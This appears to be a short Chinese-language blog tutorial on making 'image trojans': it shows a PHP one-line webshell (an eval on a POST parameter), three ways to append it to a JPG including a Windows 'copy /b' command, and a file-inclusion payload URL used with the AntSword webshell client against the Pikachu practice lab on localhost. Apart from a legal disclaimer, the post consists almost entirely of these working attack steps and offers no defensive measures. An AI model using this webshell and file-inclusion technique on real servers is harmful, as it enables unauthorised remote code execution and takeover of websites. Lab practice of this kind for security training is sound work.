大家好,欢迎来到IT知识分享网。
中华人民共和国网络安全法及本人免责声明
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助。
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,读者请勿用于其他用途,否则后果自负。
一、图片码的制作
方式一:将图片用notepad++打开,在最后面写入一句话木马
<?php @eval($_POST[‘wenjian123abd’]);?>
方式二:用winhex打开图片,末尾添加一句话木马
方式三:在windows的cmd中执行
copy 1.jpg/b+2.php/a 2.jpg
1.jpg是你要用的图片名
2.php是你要用的一句话木马名
2.jpg是生成的图片马名称
本来是两个文件,执行命令后会生成一个新文件,新文件就是图片马
二、图片马的使用
图片马的使用前提是系统存在文件包含漏洞
这里我们自己写一个php文件放入靶场www目录中,模拟文件包含漏洞
在蚁剑中输入payload
http://127.0.0.1/pikachu/vul/fileinclude.php?file=unsafeupload/uploads/3.jpg
测试图片马,三种方式均连接成功
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/133155.html